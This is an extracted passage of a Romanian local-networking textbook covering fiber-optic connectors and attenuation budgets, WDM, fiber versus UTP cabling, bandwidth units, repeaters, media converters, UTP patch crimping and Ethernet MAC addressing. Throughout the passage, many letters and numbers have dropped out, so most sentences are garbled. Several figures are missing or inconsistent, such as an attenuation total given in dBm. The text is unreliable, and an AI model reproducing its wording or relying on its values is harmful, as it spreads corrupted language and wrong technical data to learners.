două o i ai ult de ât u o e to “T. Î ziua de azi este el ai popula dato ită
pe fo a ţelo sale foa te u e, a a ipulă ii foa te fa ile şi a p eţului ap oape egal u el al
u ui o e to “T. Este dispo i il şi î a ia ta pe t u o figu aţii duple . T e uie e ţio at
ă t a s isia pe fi ă opti ă se fa e pe o pe e he u fi pe t u TX şi u ul pe t u ‘X ;
conectorii duplex permit terminarea a elo fi e î a eeaşi ufă.
Co e to ii i pu o ate ţie spo ită la te i a ea a lu ilo de fi ă opti ă, deoa e e
pu tele de jo ţiu e su t ele a e i t odu ea ai a e ate ua e şi u de se poate
î tâ pla a lu i a fi efle tată î apoi î fi ă.
1-16: Co e tori “T sus şi “C jos
Pe t u a fa e o e to ii ai uşor de recunoscut, standardul TIA- spe ifi ă u cod al

ulo ilo î a e o e to ii pe t u fi ă multi-mode au culoarea bej, iar cei pentru single-mode
su t al aşt i.
1-17: Co e tori “T şi “C
1.3.4.3 A aliza perfor a țelor u ei legături pe fi ră opti ă

Există ai ulte etode pe t u al ulul ate uă ii şi pe t u esti a ea dista ţei a i e î
azul u ei legătu i p i fi ă opti ă. Cea ai si plă şi ai p e isă etodă este folosi ea u ui
Optical Time Domain Reflectometer (OTDR). Cu ajutorul acestui instrument se o ţi e o aloa e
e a tă pe t u î t eaga e e gie e se pie de p i ate ua e atât ate ua ea ediului ât şi ea
i t odusă de o e to i sau de splice-u i . Î lipsa u ei a a te iză i igu oase date de u OTD‘,
ate ua ea u ei legătu i poate fi esti ată da ă su t u os ute lu gi ea fi ei şi a ia ilele de
atenuare.
Variabilele de atenuare sunt conectorii, splice-u ile şi ata de ate ua e pe kilo et u
spe ifi ă fi ei. Da ă u pot fi u os ute alo ile e a te pe t u toate a ia ilele, este e esa ă
o estimare a a esto a, şi a u e, lua ea î al ul a azului el ai efa o a il. Ta elul de ai
jos i lude alo ile ate uă ii sta ilite p i o e ţie EIA/TIA pe t u a ia ilele de ate ua e.
Ate ua ea i t odusă de u o e to se esti ează la , dB, ea i t odusa de un splice
e a i , dB, ia ea apă ută î azul u ei sudu i , dB.
Valo ile ap o i ati e de ai sus ep eti tă azul el ai defa o a il. Fie a e p odu ăto
de e hipa e te pe t u fi ă opti ă î ea ă să edu ă u ât ai ult ate ua ea pentru
fiecare dintre variabile.
52 | ‘ e ţ e l e L o a l e
Tipul de fi ră Lu gi ea de u dă Atenuarea / km
850 nm 3,5 dB
Multi ode / μ
1300 nm 1,5 dB
850 nm 3,5dB
Multi ode , / μ
1300 nm 1,5 dB
1310nm 0,4dB
“i gleMode μ
1550nm 0,3dB
1-18: Categorii de fi ră opti ă
Pe t u a al ula ate ua ea totală se î ulţeşte lu gi ea a lului î k u ate ua ea

o espu zătoa e tipului de fi ă şi se adu ă ate ua ea i t odusă de fie a e splice sau conector
de pe legătu ă. De e e plu, pe t u u a lu de de k de fi ă single-mode la 1310nm cu 2
o e to i şi splice-u i de tip sudu ă, ate ua ea totală se al ulează: 40km x 0,4dB/km +
0,05dB x 5 + 0,75dB x 2 = 17,75dBm.
La a eastă aloa e se e o a dă adăuga ea u ei a je de sigu a ţă de el puţi dB
deoa e e se poate î tâ pla a esti ă ile să fi fost p ea opti iste, spe ifi aţiile vendor-ului
i e a te sau, pu şi si plu, ate ua ea i t odusă de a u ite o po e te să u fi fost luată î
al ul. Ceea e î sea ă ă este e oie de o putere de aproximativ 27,75 dBm pentru ca
se alul să aju gă la desti aţie peste i elul i i de se si ilitate al e epto ului. „dB
este u itatea folosită î e p i a ea pute ii ăsu ate apo tată la u iliWatt.
Bugetul opti ep ezi tă dife e ţa di t e pute ea i i ă de t a s isie a e iţăto ului şi
se si ilitatea e epto ului. Este i po ta t a după e legătu a a fost sta ilită, să se ăsoa e şi
să se e ifi e alo ile efe ti e ale ate uă ii, pe t u a ide tifi a pote ţialele p o le e de
pe fo a ţă.
Dista ţele e o a date de ăt e IEEE pe t u u a lu de fi ă opti ă î fu ţie de
sta da dul Ethe et a e a fi folosit su t p eze tate î ta elul u ăto .
Standard Bandwidth Λ Tipul de fi ă Dista ţa

e o a dată
10BASE-FL 10 850nm Multi ode / μ sau , / μ 2 km
100BASE-FX 100 1300nm Multi ode / μ sau , / μ 2 km
100BASE-SX 100 850nm Multi ode / μ sau , / μ 300 m
1000BASE-SX 1000 850nm Multi ode / μ 550 m
Multi ode , / μ 220 m
1000BASE-LX 1000 1300nm Multi ode / μ sau , / μ 550 m
1310nm “i gle ode / μ 5 km
1000BASE-LH 1000 1550nm “i gle ode / μ 70 km
1.3.5 Multiplexarea prin divizarea lungimii de undă – WDM

Î se ţiu ile a te ioa e s-a discutat despre multiplexare, procedeul prin care mai multe
canale de date sunt combinate într-un singur canal.
WDM (Wavelength Division Multiplexing este o fo ă de ultiple a e pe t u a alele de
fi ă opti ă e du e la o eşte e se ifi ati ă a apa ităţii de t a s ite e a datelo î ediul
optic. P i ipiul de fu ţio a e al a estei teh ologii îl ep ezi tă ultiple a ea ai ulto aze
optice într-u si gu a al fi ă o u ă p i t -u siste o ple de ogli zi şi folosi ea u o
lu gi i de u dă dife ite. Cât ti p fie a e a al a e p op iul do e iu de f e e ţă lu gi e de
u dă şi toate a este do e ii su t disju te, ele pot fi ultiple ate î p eu ă pe o fi ă pe

dista ţă foa te a e.
1-19: WDM
“iste ul WDM foloseşte pe t u t a s isia pe dista ţe foarte mari un multiplexor la

t a s iţăto pe t u o i a ea se alelo pe u a al o u şi u de ultiple o la
e epto pe t u a le despă ţi. Fie a e fi ă de la desti aţie o ţi e u filt u spe ial o st uit
folosi d o p is ă , a e filt ează toate lu gi ile de u dă ai puţi u a. “e alele ezultate
pot fi utate ăt e desti aţie sau e o i ate î dife ite felu i pe t u t a s isii ulte ioa e.
Co ept pu li at î ă di a ii , teh ologia WDM a p og esat e t e de apid. Da ă
primul sistem WDM combina doa a ale, siste ele ode e pot o i a pâ ă la de
se ale, putâ d astfel e ti de u siste de G ps pâ ă la o aloa e teo eti ă de T ps doa
pe o pe e he de fi ă opti ă. Î e istau p oduse pe piaţă u de a ale de G ps
fiecare, deci u total de G ps. Î la o atoa e se lu ează deja la siste e a ple e up i d
peste de a ale. Atu i â d u ă ul de a ale este foa te a e şi lu gi ile de u dă su t
foarte apropiate (0,1nm) sistemul este numit DWDM (Dense WDM).
1.3.6 Comparaţie între fibra optică şi cablul UTP

La î eputu ile fi ei opti e au e istat pă e i o fo ă o a î „ âţi a a i fi ele de up u
o fi î lo uite î totalitate u fi ă opti ă. A est lu u s-a do edit g eşit. P i t e a a tajele pe
a e le p ezi tă fi ele de up u se u ă ă: p eţul s ăzut, i stala ea fa ilă, faptul ă u
necesită ate ţie spo ită î utiliza e. Aceste avantaje fac firele de cupru mediul ideal pentru
a lă i î eţele i i şi ijlo ii, î i te io ul lădi ilo , u de u se justifi ă fi a opti ă. Printre
dezavantajele majore ale firelor de cupru se u ă ă: su t sus epti ile la i te fe e ţe ele t i e
şi pot fi folosite pe dista ţe elati i i - oricum mult, mult mai mici decât echivalentul lor în
fi ă opti ă.
Fibra are multe avantaje. În primul rând, lă gi ea de a dă pe a e o supo tă este ai
a e de ât a up ului. U si gu a lu de fi ă opti ă multi-mode e o ţi e ai ulte fi e
poate purta acum aproape 5 milioane de convorbiri telefonice simultane. Fibra are avantajul
ă u este afe tată de şo u ile ele t i e, de i te fe e ţa â pului ele t o ag eti sau de
ăde ile de te siu e. De ase e ea, u este afe tată de su sta ţele hi i e o ozi e di ae ,
fii d ideală pe t u ediile asp e di fa i i. Co pa iile de telefoa e p efe ă fi a şi di alt
oti : este su ţi e şi foa te uşoa ă. Ca alele u a lu i su t, î ge e al, pli e pâ ă la efuz;
p i î lo ui ea up ului u fi ă se goles a alele, ia up ul a e o aloa e foa te u ă pe
piaţă. Î plus, de a lu i to sadate de k lu gi e â tă esc 7250 kg. Un cablu ce
o ţi e fi e şi a e a eeaşi apa itate â tă eşte doa kg, a est lu u edu â d d asti
e esitatea u o e hipa e te e a i e s u pe a e t e uie î t eţi ute. Î fi e, fi ele
opti e i t odu o ate ua e eglija ilă şi su t foa te difi il de i te eptat. A est lu u le ofe ă o
e ele tă se u itate. Moti ul pe t u a e fi a este ai u ă de ât up ul este i t i se .
Ele t o ii î iş a e di t -u a lu i te a ţio ează u alţi ele t o i şi su t i flue ţaţi de alţi
54 | ‘ e ţ e l e L o a l e
electroni din afara cablului. Fotonii dintr-o fi ă u i te a ţio ează î t e ei şi u su t afe taţi
de fotonii din exterior.
Pe de altă pa te, fi a este o teh ologie ai puţi fa ilia ă şi e esită o p egăti e pe a e
ulţi i gi e i u o au. Te i a ea fi ei adi ă ataşa ea o e to ilo este u p o edeu difi il
a e e esită ultă p egăti e şi e pe ie ţă. De ase e ea, fi a opti ă este sufi ie t de
p ete ţioasă şi, de a eea, e esită o utiliza e ai ate tă de ât a lul UTP u t e uie î doită
p ea ta e, ăl ată sau st â să după pi io ul esei, et . Deoa e e t a s isia opti ă este p i
atu a ei u idi e ţio ală, o u i aţiile idi e ţio ale e esită fie două fi e, fie două e zi de
f e e ţă dife ite pe a eeaşi fi ă. Nu î ulti ul â d, i te feţele pe t u fi ă ostă ult ai
ult de ât i te feţele ele t i e.
Cu toate a estea, este foa te p o a il ă î iito toate o u i aţiile de date pe lu gi i
ai a i de âte a ze i de kilo et i se o fa e p i fi ă opti ă.
1.4 Caracteristici ale mediilor de transmisie

1.4.1 Frecvenţa
F e e ţa este, p o a il, el ai i po ta t pa a et u al ediului de t a s isie. Ea este
ea a e a ată âte se ale pot fi puse pe ediu î u itatea de ti p, aşada , a e este
a titatea a i ă de i fo aţie e a putea fi t a sfe ată.
1.4.2 Lăţimea de bandă

Te e ul de lăţi e de a dă bandwidth poate fi i te p etat î două felu i. U ul di t e
se su i este a ela al dife e ţei di t e două i elu i de f e e ţă, adi ă di e siu ea u ei e zi
de f e e ţă ăsu ată î He tzi .
Cel de-al doilea sens al termenului i di ă u ă ul a i de iţi t a sfe aţi sau p o esaţi
î u itatea de ti p. Ta elul de ai jos poate da o idee desp e e lăţi e de a dă o upă
di e se se i ii ofe ite de eţelele a tuale.
Voce (VoIP) 0,1 Mbps

Navigare pe internet 5 Mbps
I te a ţiu i video, jocuri,
10 Mbps
EoD E te tai e t o De a d , ideo o fe i ţe
HDTV, IPTV,
30 Mbps
VoD (Voice on Demand) 1 - 3 canale
Di a est ta el pute o se a ă î iito , pe t u a e efi ia şi de se i ii HDTV, e i ţele

i i e ale u ei eţele î eea e p i eşte lăţi ea de a dă o depăşi M ps.
1.4.3 Unităţi de măsură

U ităţile de ăsu ă ep ezi tă u a di t e ele ai f e e te su se de e o i î dis uţiile
desp e eţelele de al ulatoa e. E o ile ţi atât de u ităţile de ăsu ă p op iu-zise, ât şi de
multiplii acestora.
Prima confuzie apare în exprimarea vitezei de transfer. Capacitatea mediului de transmisie
este ăsu ată î iți pe se u dă, î e e e a titatea de date t a sfe ată este el ai
adesea e p i ată î o teți pe se u dă. Î plus, otaţiile elo două u ităţi de ăsu ă su t
foa te si ila e: î p i ul az se foloseşte otaţia ps, ia pe t u t a sfe ul de date Bps.
Atu i â d u ode se o e tează la , k, a eştia su t k ps, ia p i î pă ţi ea la 8
se o ţi 4,2 kiloBytes. Pentru acest az, da ă fe east a browser-ului e a ată o iteză de
des ă a e de k, adi ă kB tes, o e iu ea este o side ată de u ă alitate. Cu toate

a estea, se poate î tâ pla a iteza de t a sfe afişată să fie ai a e de ât iteza
ode ului. E pli aţia ea ai p o a ilă a u ei astfel de situaţii este ă datele t a sfe ate su t
e o p i ate fişie e te t, sp e e e plu, precum codul paginilor HTML şi ode ul sau
apli aţia de t a sfe ealizează o o p esie a a esto a.
U alt fa to î dife e ţa di t e iteza ediului şi iteza de t a sfe a datelo este
a titatea de i fo aţie adăugată de sti a de p oto oale p i dife itele a tete. Pe t u o
t a s isie e foloseşte TCP/IP peste Ethernet a eastă i fo aţie supli e ta ă a iază î t e
şi de o teţi, eea e pe t u ad u de a i de o teţi spe ifi at de Ethernet î sea ă
ă pâ ă la , % di i fo aţia t a sfe ată u e i fo aţie utilă. A eastă aloa e este şi ai
a e da ă u se foloses doa pa hete de di e siu e a i ă. Altfel spus, pe t u o eţea
Ethernet, deşi a easta dispu e de o lăţi e de a dă de M ps, iteza de t a sfe a datelo
este de aproximativ 1,15 MBps.
O a doua o fuzie i po ta tă apa e î e p i a ea ultiplilo u ităţilo de ăsu ă. Î
t a s isia de date u kilo it ep ezi tă de iţi, î e e e di pu tul de ede e al
siste elo de ope a e u kilo it este o pus di de iţi.
Noţiu ea de baud e a folosită a u itate de ăsu ă î e p i a ea itezei pe t u
t a s isiile de date, î spe ial pe legătu ile se iale. Nu ă ul de auzi i di a u ă ul de
s hi ă i pe se u dă ale stă ii ediului de t a s isie de s hi ă i ale i elului de te siu e .
Î t u ât o astfel de s hi a e sesizată pe ediu poate fi i te p etată u doa a u si gu it,
i şi a doi sau ai ulţi, î fu ţie de odula ea folosită, u itatea de ăsu ă ade ată este
ea de ps iţi pe se u dă .
1.4.4 Baseband şi broadband

Termenii de „baseband î a dă de ază şi „broadband î a dă la gă des iu
u ă ul de a ale de o u i aţie folosite pe u a u it ediu de t a smisie. Cu alte cuvinte,
pe u fi de up u t a s isia poate fi fă ută pe u si gu a al de o u i aţie azul
baseband) sau pe mai multe canale (cazul broadband).
Î azul o u i aţiei î a dă de ază, pe mediul de transmisie e istă un sigur semnal.
Acel se al poate a ea ai ulte o po e te, î să di pu t de ede e al fi ului de up u
sau al fibrei optice este un singur semnal (electric sau optic).
1-20: Transmisie baseband î a da de ază
De exemplu, î telefo ia fi ă di ‘o â ia ediul fizi de t a s isie este al ătuit di două

fi e to sadate. “e alul este o ea u a ă t a s isă p i i te ediul telefo ului; î azul î
care este folosit un modem pentru dial-up, se alul o stă di datele t a s ise de calculator.
A est siste de o u i aţie este de tip baseband, deoa e e ele două o u i aţii u pot
a ea lo si ulta . Da ă î să se utilizează o o e iu e D“L, atu i pe a elaşi ediu fizi pot fi
ealizate si ulta şi telefo ie şi t a s isie de date.
Î azul o u i aţiei î a dă largă, pe a elaşi ediu fizi e istă ai ulte a ale de
o u i aţie i depe de te, ultiple ate î t -un singur semnal broadband.
56 | ‘ e ţ e l e L o a l e
1-21: Transmisie broadband î a dă largă
Un exemplu de transmisie broadband foa te des î tâl ită este CATV. CATV community
antenna television) este, de fapt, sistemul de televiziune prin cablu comun. Principiul de
fu ţio a e este si plu: ultiple a ea î f e e ţă. Fie a e a al de tele iziu e a e alo ată o
a dă de f e e ţă de MHz. Fi a de tele iziu e p i a lu e epţio ează p a ti postu ile
TV de la dife ite su se, p i dife ite etode a lu de up u, fi ă opti ă, a te e adio şi
compune aceste semnale independente într-un singur semnal broadband, folosi d o teh i ă
opti izată de ultiple a e î f e e ţă. A est se al broadband este trimis pe cablul coaxial
e aju ge a asă, î tele izo . A esta, la â dul sau, utilizează u de ultiple o e sepa ă
semnalul broadband primit în canalele i depe de te i iţiale.
Caracteristicile conexiunilor broadband se edefi es î pe a e ţă, odată u t e e ea
ti pului, şi a iază î fu ţie de ţa ă. Î , sp e e e plu, o o e iu e broadband în Anglia
t e uie să ofe e i i M ps, î Ge a ia şi “tatele Unite serviciile boadband încep de la 4
Mbps, în vreme ce în Japonia majoritatea furnizorilor de servicii broadband ofe ă i i
Mbps
1.5 Echipamente de reţea de nivel fizic

Deoa e e la i el fizi u e istă date, i doa se ale, a este e hipa e te u fa de ât să
p elu eze se alul fizi , fă ă să î e e să i te p eteze datele t a s ise p i a el se al.
1.5.1 Repetorul
P i ipala fu ţie a epeto ului este a eea de a e ti de sup afaţa a ope ită de o eţea.
‘epeto ul este u e hipa e t a e p i eşte u se al şi îl et a s ite la o pute e ai a e,
î piedi â d a ate ua ea sa ati gă o aloa e p ea a e, sau îl edi e ţio ează, pe t u a
se alul să poată o oli u o sta ol. “u t i po ta te aspe tele legate de ost şi, î spe ial, de
late ţa i t odusă. A ele t e uie să fie ât ai i i.
U epeto digital a plifi ă, estau ează, si o izează sau apli ă o i e o i aţie a
a esto fu ţii asup a u ui se al digital.
Co u i aţiile i te o ti e tale sau ele pe su o ea a fi i posi ile fă ă e iste ţa
repetoarelor.
1.5.1.1 Pentru cupru - Hub

Hubul sau repetorul multiport poate conecta mai multe cabluri, astfel încât toate vor face
parte dintr-un segment de eţea pa tajat. Î t u ât hu ul este un dispozitiv de nivel fizic, el nu
i te p etează î i iun fel semnalul, ci doar îl trimite mai departe pe toate porturile, cu
e epţia elui pe a e a fost e epţio at. Î od e ide t, a easta du e la u is foa te idi at
al p odu e ii de oliziu i, t ata ea lo ă â â d de e i d espo sa ilitatea fie ă ei staţii
conectate.
Odată u s ăde ea p eţu ilo la s it hu i, hu u ile au î eput să u ai fie folosite î

eţele lo ale; ele ai pot fi ăzute doa î i f ast u tu i ai e hi.
1.5.1.2 Repetoare optice

După u s-a o se at, li ită ile dista ţei a i e la a e se poate î ti de un segment de
fi ă opti ă su t date u ai de pute ea de e ite e a dispoziti elo te i ale. De a eea,
pe t u e ti de ea a iei de a ope i e î siste ele de fi ă opti ă se foloses epetoa e şi
a plifi atoa e opti e, apa ile să ege e eze se alele pe dista ţe de sute de kilo et i.
U epeto folosit î o u i aţia p i fi ă opti ă, u os ut şi su u ele de OEO
(Optical-Electrical-Optical este u dispoziti a ă ui p i ipală fu ţie este să p i eas ă
se alul opti , să îl t a sfo e î se al ele t i , să îl p elu eze şi apoi să e ită di ou
semnalul optic, eliminând astfel atenuarea acestuia ce poate duce la erori de interpretare în
azul t a s isiilo pe dista ţe foa te a i. Î ziua de azi, di auza efi ie ţei s ăzute şi a
costului mare de implementare, repetoarele au fost înlocuite cu amplificatoare optice (EDFA -
Erbium Doped Fiber Amplifier . A estea pot a plifi a se alul o dată la k fă ă a ai fi
e oie de o e sii ultiple î t e se alele ele t i e şi ele opti e. U a plifi ato optic
eşte pute ea se alului fă ă să îl t a sfo e î se al ele t i , eea e î sea ă ă u îl
ege e ează, i doa îl a plifi ă. A eastă teh i ă este posi ilă deoa e e î ediul opti
ate ua ea este ea a e li itează dista ţele şi u disto sio a ea semnalului.
I o aţiile e e te î do e iul fi ei opti e şi al o u i aţiilo p i fi ă opti ă au edus
degradarea semnalului optic atât de mult încât nevoia de regenerare a acestuia apare pe
dista ţe e depăşes âte a sute de kilo et i. A easta a es ut efi ie ţa eţelelo opti e, ai
ales a celor ce se întind pe sub oceane (Atlantis- , TGN Atla ti , Hi e ia , u de ostul şi
efi ie ţa a plifi atoa elo este u ul di t e fa to ii heie e dete i ă pe fo a ţa î t egului
sistem de cablare1.
1.5.1.3 Repetoare wireless

Pe lâ gă ege e a ea se alului, epetoa ele wireless su t folosite şi pe t u ghida ea
a estuia. “p e e e plu, da ă î t e două e t e de e isie adio e istă u o sta ol un deal mai
înalt, sau un munte) şi ele u se „ ăd , o u i aţia u este posi ilă. Pe t u a se alul adio
să poată fi e epţio at şi de ealaltă pa te a o sta olului, este e esa ă i stala ea, hia î
vârf, a unui repetor wireless a e să p eia se alul de pe u e sa t şi să îl e ită ăt e
elălalt. A eastă teh i ă este folosită pe t u o i e fel de t a s isii fă ă fi : adio, tele iziu e,
telefo ie o ilă, et . F e e ţele u delo u a e se ope ează su t up i se î t e f e e ţele
u delo adio şi ale i ou delo .
Di pu t de ede e al ali e tă ii u e e gie ele t i ă, epetoarele wireless se împart în
a ti e şi pasi e. Cele a ti e o stau î a te e di e ţio ale i stalate î lo aţii u î ălţi i ât
ai a i tu u ile adio, de tele iziu e, et , e pe it a esul la o su să de ali e ta e
ele t i ă. Î lo u ile g eu a esi ile â fu i de u te, deşe t, et su t o tate epetoa ele
pasi e, a e u e esită o su să de e e gie ele t i ă, î să p opagă u se al ult ai sla .
E istă şi epetoa e adio pe t u adio-a ato i sau pe t u ei a e o să e ti dă zo a de
acoperire a echipamentelor wireless de pute e i ă. A estea a ope ă dista ţe ai s u te de
ordinul sutelor de metri).
1
http://www.atlantic-cable.com/Maps/index.htm
58 | ‘ e ţ e l e L o a l e
1.5.2 Convertorul
Convertorul sau transceiver-ul - termen provenind din combinarea lui trans(mitter) cu
(re)ceiver - ofe ă posi ilitatea i te o e tă ii a două edii de o u i aţie dife ite.
Co e toa ele su t lasifi ate î două atego ii: o e toa e pasi e şi o e toa e a ti e, ele
di u ă e esitâ d ali e ta ea la o su să de u e t pe t u a putea fu ţio a.
1.5.2.1 Convertoare pasive

În categoria convertoarelor pasive sunt convertoarele ce fac trecerea de la conectorul DB-
AUI , la UTP sau BNC. Deşi eţelele lo ale pe a lu g os au dispă ut odată u e i ea a ilo
, i te feţele AUI au fost i te feţele Ethernet standard pentru routerele oferite de
majoritatea p odu ăto ilo de e hipa e te de eţea, pâ ă sp e sfâ şitul a ilo . Pe t u
folosi ea u ei astfel de i te feţe î t -o eţea lo ală este e oie de u o e to . Di pă ate,
p eţul u ui o e to AUI a ă as o sta t de ap oape a i, î ju ul alo ii de 25 de USD.
Convertoarele UTP – BNC nu s-au u u at de o popula itate p ea a e dato ită i teg ă ii
fu ţiei de o e sie î t e ediul oa ial şi el to sadat la i elul hu ului, p e u şi a
te di ţei o ti ue de s ăde e a p eţu ilo pe t u hu u i.
1.5.2.2 Convertoare electric – optic

Cel mai frecvent întâlnite convertoare active fac trecerea de la mediul optic la cel electric.
Aceste convertoare se numesc MC (Media Convertor , deşi u eo i su t u ite tot
transceivere. O alte ati ă la folosi ea u ui astfel de o e to o ep ezi tă s it hu ile, e
ofe ă atât i te feţe opti e, ât şi po tu i ‘J- . Totuşi, ostul u ui astfel de s it h depăşeşte
1000 USD, în vreme ce costul unui MAU (Medium Attachement Unit os ilează î ju ul a
USD.
1.5.2.3 Convertoare electric – wireless

Dispoziti ul a e t a sfo ă se alul ele t i p i it pe fi de up u î u dă
ele t o ag eti ă de î altă f e e ţă pe a e o î p ăştie î ae este Acces-Point-ul. Deoarece
standardele de transmisie wireless o ţi spe ifi aţiile de i el fizi dista ţa, lăţi ea de
a dă, pute ea de t a s isie î st â să legătu ă u ele de i el legătu ă de date, s-a optat
pe t u p eze ta ea soluţiilo de o u i aţie fă ă fi î t -un capitol dedicat.
1.6 Studii de caz

1.6.1 Realizarea patch-urilor UTP straight-through, crossover, rollover
Pentru sertizarea unui cablu UTP CAT5 este necesar u leşte de se tizat şi de u o e to
P C u it şi ‘J . P i a ope aţie o stă î î lătu a ea izolaţiei di ju ul fi elo di a lu.
T e uie a o dată o ate ţie deose ită la deto sadarea firelor: atunci când se î depă tează
a şo ul de plasti şi se deto sadează pe e hile pe t u a putea i t odu e fi ele î ufă,
t e uie a u ata de a lu deto sadat sa fie ât ai i ă. Î az o t a , a apă ea o
i te fe e ţă î t e fi e e p odu e efectul de crosstalk. Practic, se taie 3- di a şo , se
deto sadează fi ele, se a a jează î o di ea do ită, ia apoi, u ajuto ul u o la e ale leştelui
de sertizat, se taie fi ele astfel î ât di e siu ea zo ei eizolate să ep ezi te ap o i ati ¾
di lu gi ea ufei. Î a est fel, fi ele o aju ge pâ ă î apătul ufei asigu â d u o ta t
ele t i pe fe t, ia u ata deto sadată a fi ap oape i e iste tă, i i izâ d is ul apa iţiei
crosstalk-ului.
Mufele RJ-45, folosite pentru terminarea cablurilo UTP, o ţi lă aşu i î a e t e uie
aduse ele fi e. Pi ii o e to ului su t işte la ele etali e a e, i iţial, se află deasup a
lă aşului, pe t u a fi ul de up u să poată i t a. P i folosi ea leştelui de se tizat la elele

sunt împinse în lă aşu ile u de se găses fi ele. P i apăsa e, la elele o st ăpu ge fi ul de
cupru, realizându-se astfel contactul electric.
Pentru realizarea unui patch UTP straight-through fi ele t e uie să se găseas ă î a ii
o e to i, fie î o di ea i pusă de T A, fie T B. A elaşi sta da d t e uie espe tat şi la
u apăt şi la elălalt.
Pentru realizarea unui patch UTP crossover perechea verde dintr-u apăt este i e sată
u pe e hea po to alie di elălalt. Cu alte u i te, u a di te i aţii espe tă T A, ealaltă
T568B.
Pentru realizarea unui patch UTP rollover, se se tizează u apăt al a lului folosi d u ul
dintre sta da de, ia la elălalt apăt fi ele se aşează î o di e i e să î ogli dă – pinul 1 va
corespunde pinului 8, pinul 2 va corespunde pinului 6, etc.
O di ea fi elo pe t u ele două sta da de se egăseşte î figu a 1-11.
Da ă u se espe tă sta da dul, e istă un is ajo a ele două fi e folosite pe t u ‘
sau T să u fa ă pa te di a eeaşi pe e he, şi să u-şi ai a uleze e ip o â pu ile
ele t i e. P a ti , to sada ea u ai a ţio ează o e t si su t ge e ate i te fe e ţe e
alte ează se alul ele t i . Cu alte u i te o i u a e ge, o i a e ge e t e de p ost!
În general, în Europa se foloseşte sta da dul B , ia î “tatele U ite A. De e este
i po ta t de ştiut şi de espe tat a est lu u? Teo eti , u o tează a e di a est sta da d
este utilizat atât ti p ât a ele ufe de la ele două apete su t fă ute folosi d a elaşi
sta da d. P a ti î să, la o st ui ea şi ad i ist a ea u ei eţele de a i di e siu i lu ează
ulţi oa e i, a e u î totdeau a o u i ă î t e ei. Aşada , pe t u edu e ea e o ilo
u a e este e esa ă espe ta ea a eluiaşi sta da d.
60 | ‘ e ţ e l e L o a l e
2 Reţele Ethernet
 Ce ep ezi tă sta da dul .
 Cu fu ţio ează C“MA/CD
 Modul de fu ţio a e al u ui s it h Ethernet
 Cum sunt evitate buclele de nivel 2 folosind STP
 ‘eţea lo ală i tuală VLAN
 Standardul 802.1Q
Cine este...
Norman Abramson este i ep eşedi tele ALOHA et, p i a eţea de al ulatoa e,
î fii ţată la U i e sitatea di Ha aii. Ideea ALOHA et este de a folosi o i f ast u tu ă de
ost s ăzut de tipul adioului pe t u a ato i pe t u a lega al ulatoa ele u i e sităţii,
aflate la ma e dista ţă. Desi eţeaua u se ai foloseste, a ep eze tat u pu t de
pornire al Interetului. Norman Abramson a primit de la IEEE medalia Alexander Graham
Bell.
Bob Metcalfe este co-i e tato al p oto olului Ethe et, fo dato al Co și al legii
care îi poa tă u ele. Î ti p e își susţi ea do to atul la MIT s-a implicat în conectarea
u i e sităţii la oua eţea ARPA et, fii d espo sa il u găsi ea u ui ha d a e a e să
fa ă legatu a. Î ti p e a fost a gajat la Xe o PARC a o-inventat Ethernetul. Dupa ce a
ple at de la Xe o a po it Co , o pa ie e fa i ă o po e te de eţelisti ă. Legea lui
Met alfe afi ă ă aloa ea u ei eţele de tele o u i aţii este di e t p opo ţio ală u
păt atul u ă ului de utilizato i.
2.1 Noţiuni generale

Ethernet este î ziua de azi teh ologia do i a tă de LAN, e defi eşte u u ă de
sta da de pe t u i elul fizi , o etodă de a es la ediu C“MA/CD şi o s he ă de
adresare. Primul standard Ethernet a fost pu li at î de u o so ţiu fo at di fi ele
DEC, Intel şi Xe o , o so ţiu u it DIX. Cu âte a odifi ă i i o e, a esta a de e it t ei a i
mai târziu standardul IEEE 802.3. Alte standarde IEEE importante sunt : 802.11 – Wireless LAN;
802.1d – defi i e ad e spe iale BPDU şi fu ţio a ea a esto a; . – standard pentru
VLAN-uri ; 802.1x – standard de autentificare.
Pe t u o u i a ea î ad ul u ei eţele Ethernet, a şi î azul alto sta da de IEEE ,
fie ă ei staţii i se at i uie o ad esă MAC Media Access Control u i ă pe de iţi e p i aţi î
if e he aze i ale, e este folosită pe t u a spe ifi a atât su sa ât şi desti aţia fie ă ui
pachet de date.
Ad esa MAC este u şi de iţi folosit pe t u asigu a ea u i ităţii î eţelele Ethernet.
O ad esă MAC este sto ată î e o ia ‘OM şi este î ă ată î ‘AM î o e tul
i iţializă ii plă ii de eţea. Di a eastă auză ad esele MAC ai su t u ite şi ad ese fizi e sau
burned-in addresses (BIAs).
Ad esele MAC su t ad ese e foloses o s he ă de ad esa e plată spaţiul de ad esa e
ocupat treptat şi o plet . Cu stau lu u ile î ealitate? I stituţia e ad i ist ează ad esele
fizi e este IEEE. P o le a este ă IEEE u poate o ito iza di e t at i ui ea fie ă ei ad ese
fizi e, astfel î ât t a sfe ă a eastă espo sa ilitate p odu ăto ilo . Di ei o teţi e o pu
ad esa fizi ă p i ii t ei o fi folosiţi pe t u ide tifi a ea fa i a tului, a est â p fii d
61 | ‘ e ţ e l e E t h e et
denumit Organizational Unique Identifier OUI , ia u ăto ii t ei o teţi su t daţi de ăt e

fa i a t î od u i fie ă ui dispoziti de eţea. Astfel, spaţiul ad eselo fizi e poate fi
o do at fă ă î doială după p odu ăto , i fo aţie totuşi i utilă, deoa e e a se î tâ plă a
într-o eţea să e iste dispoziti e de eţea p oduse de u si gu p odu ăto .
Î o luzie ulţi ea ad eselo fizi e este o ulţi e eo do ată, a e î plus u poate
folosi i teg al spaţiul de ad ese. Cu toate a estea s he a de ad esa e fizi ă este u ul di t e
puţi ele lu u i e u a t e uit s hi at şi i i ă a a tualizat pe pa u sul ulti ilo douăze i
de ani. IEEE a a u ţat faptul ă spaţiul ad eselo fizi e u a fi epuizat mai devreme de anul
21001. Deşi dife e ţa î t e s he a de ad esa e fizi ă MAC - de iţi şi s he a de ad esa e
de i el t ei do i a tă astăzi î I te et IP , e asigu ă ide tifi a ea fie ă ei staţii î od
unic printr-o ad esă logi ă pe de iţi, u este foa te a e doa iţi , î ziua de astăzi
e istă o e oie de e ti de e a elei di u ă la de iţi IP . Apa iţia şi dez olta ea apidă
a eţelelo de al ulatoa e pe so ale a du e t eptat la epuiza ea ad eselo IP , esti ată de
unii vizionari între anii 2019 – 2040.
Ad esele fizi e ofe ă supo t pe t u tipu i de o u i aţie: di e tă unicast), prin difuzare
(broadcast şi u desti aţie ultiplă multicast , p i ele două tipuri fiind mult mai populare
de ât ulti ul tip de o u i aţie. Ad esa de difuza e pe t u i elul legătu ă de date a e o
aloa e u i ă, a easta fii d: FF:FF:FF:FF:FF:FF.
